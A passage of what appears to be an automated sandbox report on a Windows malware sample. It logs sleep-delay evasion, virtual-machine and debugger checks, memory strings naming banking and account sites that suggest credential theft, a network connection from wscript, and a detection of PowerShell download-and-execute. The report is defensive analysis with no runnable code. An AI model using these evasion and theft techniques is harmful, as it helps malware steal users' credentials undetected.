          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595687
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595574
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595354
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595242
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595078
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594929
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594796
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594625
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594484
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594326
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594124
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593984
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593705
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593575
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593456
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593200
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593085
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592941
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592343
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592156
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591988
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591859
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591741
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591625
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2271
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1018
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3737
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6087
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 3697
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 5925
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep count: 3737 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep count: 6087 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7988Thread sleep time: -17524406870024063s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -27670116110564310s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -600000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7000Thread sleep count: 3697 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -599718s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7000Thread sleep count: 5925 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -599593s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -599465s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -599355s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -599249s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -599140s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -599031s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598921s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598810s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598699s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598593s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598484s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598374s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598265s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598149s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598039s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -597922s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -597812s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -597695s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -597578s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -597372s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -597265s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -597155s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -597044s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596937s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596827s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596716s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596609s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596499s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596389s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596281s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596171s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596053s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -595922s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -595797s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -595687s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -595574s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -595466s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -595354s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -595242s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -595078s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -594929s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -594796s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -594625s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -594484s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -594326s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -594124s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -593984s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -593835s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -593705s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -593575s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -593456s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -593324s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -593200s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -593085s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -592941s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -592608s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -592343s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -592156s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -591988s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -591859s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -591741s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -591625s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 600000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599718
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599593
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599465
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599355
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599249
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599140
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599031
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598921
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598810
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598699
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598593
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598484
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598374
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598265
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598149
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598039
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597922
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597812
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597695
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597578
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597372
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597265
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597155
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597044
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596937
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596827
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596716
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596609
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596499
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596389
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596281
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596053
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595922
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595797
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595687
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595574
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595354
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595242
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595078
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594929
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594796
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594625
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594484
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594326
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594124
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593984
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593705
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593575
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593456
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593200
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593085
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592941
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592343
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592156
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591988
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591859
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591741
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591625
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
          Source: AddInProcess32.exe, 00000009.00000002.1740784660.0000000006230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.0000000003FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: nawomaqemuv
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: AMC password management pageVMware20,11696494690
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: interactivebrokers.comVMware20,11696494690
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
          Source: wscript.exe, 00000000.00000003.1408406314.00000260C4BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409759305.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409759305.00000260C4C5C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C5C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: AddInProcess32.exe, 00000009.00000002.1740784660.0000000006230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.0000000003FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qemucaqecet
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000030C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachine: False
          Source: AddInProcess32.exe, 00000009.00000002.1674833738.000000000148A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: tasks.office.comVMware20,11696494690o
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
          Source: AddInProcess32.exe, 00000009.00000002.1740784660.0000000006230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.0000000003FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: siqemuwalidilenigeg
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000305F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachine: ;
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
          Source: AddInProcess32.exe, 00000009.00000002.1740784660.0000000006230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.0000000003FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: momulumeguqemuyufum
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: global block list test formVMware20,11696494690
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: bankofamerica.comVMware20,11696494690x
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMToolsHook
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
          Source: powershell.exe, 00000005.00000002.1593249339.0000021C89401000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: gWtuVMciUCk47FiAJeN
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMToolsHook.dll
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: discord.comVMware20,11696494690f
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: outlook.office.comVMware20,11696494690s
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmmousever.dll
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmmousever
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmmouseverLR
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: outlook.office365.comVMware20,11696494690t
          Source: AddInProcess32.exe, 00000009.00000002.1740784660.0000000006230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.0000000003FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qodoqemuned
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareLR
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachine:
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: dev.azure.comVMware20,11696494690j
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMToolsHookLR
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

          Anti Debugging

          barindex
          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_06427368 CheckRemoteDebuggerPresent,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.97.3 443
          Yara detected Powershell download and execute
          Source: Yara matchFile source: amsi64_7908.amsi.csv, type: OTHER
